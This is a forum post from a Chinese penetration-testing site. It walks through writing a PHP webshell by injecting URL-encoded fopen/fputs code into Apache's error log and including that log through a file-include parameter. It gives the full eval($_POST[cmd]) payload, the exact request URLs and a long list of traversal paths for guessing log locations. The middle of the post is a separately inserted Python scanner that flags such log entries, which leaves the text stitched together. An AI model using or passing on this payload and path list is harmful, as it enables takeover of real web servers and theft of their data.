中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: PHP include of Apache log to write a webshell

Author: admin    Time: 2012-9-15 14:27
Because the method above is very impractical (in my tests I found the log is often tens of megabytes, so that approach is no fun to play with), let's take it a step further: write a genuinely practical webshell to use, which is also far better than the painfully slow method above.

Take, for example, the same one-line trojan:
<?eval($_POST[cmd]);?>

By now you have probably thought of it: this is a pretty good method. Read on, because how to write it in becomes the question. Use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?>   //writes the one-line trojan statement into config.php

We submit this statement and let Apache record it in the error log; including the log then writes the shell. Remember that it only works if you convert it to URL-encoded form. Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

Now the error log has recorded this line of code that writes the webshell.
Next we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

That writes the webshell successfully: config.php now contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Connect to it directly with lanker's client and the host is yours.

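From the defender's side, the two requests described above leave characteristic traces: the error log entry carries PHP tags and file-writing calls, and the access log shows a request that passes a traversal path ending in a log file name to an include parameter. The following Python scanner is an added example, not part of the original post or of any tool it mentions; it runs over constructed sample log lines (RFC 5737 documentation addresses, the post's own payload and paths) and flags both kinds of entry. The indicator names and regexes are this example's own choices.

```python
"""Flag Apache log entries that carry planted PHP code (log poisoning) and
requests that try to include a log file through a PHP include parameter.
Added example for this post; the sample lines below are constructed, not real logs."""
import re
from urllib.parse import unquote

# A PHP open tag: "<?php", "<?=", "<?$var", "<?eval" ... but not "<?xml".
PHP_OPEN_TAG = re.compile(r"<\?(?!xml\b)(?:php\b|=|\s|\$|[A-Za-z_])", re.IGNORECASE)
# Calls the planted code needs to write a file or execute input.
PHP_CALLS = re.compile(
    r"\b(?:eval|fopen|fputs|fwrite|file_put_contents|system|passthru|shell_exec)\s*\(",
    re.IGNORECASE)
# Directory traversal in a decoded request.
TRAVERSAL = re.compile(r"\.\./")
# A query parameter whose value is a relative or absolute path to an
# access/error log; "acces" covers the misspelled names in the post's list.
LOG_INCLUDE = re.compile(
    r'[?&][A-Za-z0-9_]+=(?:\.\./|/)[^ "&]*(?:access|acces|error)[._-]?log\b',
    re.IGNORECASE)


def fully_decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are exposed too."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_line(line):
    """Return the indicator names found in one log line (empty list if clean)."""
    decoded = fully_decode(line)
    hits = []
    if PHP_OPEN_TAG.search(decoded):
        hits.append("php_open_tag")
    if PHP_CALLS.search(decoded):
        hits.append("php_function_call")
    if TRAVERSAL.search(decoded):
        hits.append("path_traversal")
    if LOG_INCLUDE.search(decoded):
        hits.append("log_file_include")
    return hits


def scan_log_lines(lines):
    """Scan an iterable of log lines; return [(line_number, indicators), ...]."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = classify_line(line)
        if hits:
            findings.append((number, hits))
    return findings


# Constructed sample entries mirroring the post's steps (not captured from a server).
SAMPLE_LOG_LINES = [
    # error_log: Apache logs the decoded request path, so the planted code is in clear.
    '[Sat Sep 15 14:27:01 2012] [error] [client 203.0.113.5] File does not exist: '
    '/home/virtual/www.xxx.com/htdocs/<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");'
    'fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?>',
    # access_log: the same request, still URL-encoded in the request line.
    '203.0.113.5 - - [15/Sep/2012:14:27:01 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual'
    '%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval'
    '%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E HTTP/1.1" 404 210',
    # access_log: the follow-up request that includes the error log via z.php.
    '203.0.113.5 - - [15/Sep/2012:14:31:40 +0800] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 20480',
    # Ordinary traffic that must not be flagged.
    '198.51.100.9 - - [15/Sep/2012:14:32:00 +0800] "GET /forum/index.php?mod=view&id=12 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, hits in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: {', '.join(hits)}")
```

The scanner decodes each line a few times before matching, because the request line in access_log keeps the percent-encoding while the error_log entry stores the decoded path; double-encoded variants are caught the same way. The checks are deliberately coarse (any PHP open tag in a log entry is worth a look), so tune the call list and log file names to the paths the server actually uses.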
PS: The prerequisite for everything above is that the directory permissions must be writable; it has to be -rwxrwxrwx (777) to proceed, which you can check directly in the directory listed above. Everything above is exploitation in the case where the log path is known.

As for other log paths, you can guess them, or refer to this list.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2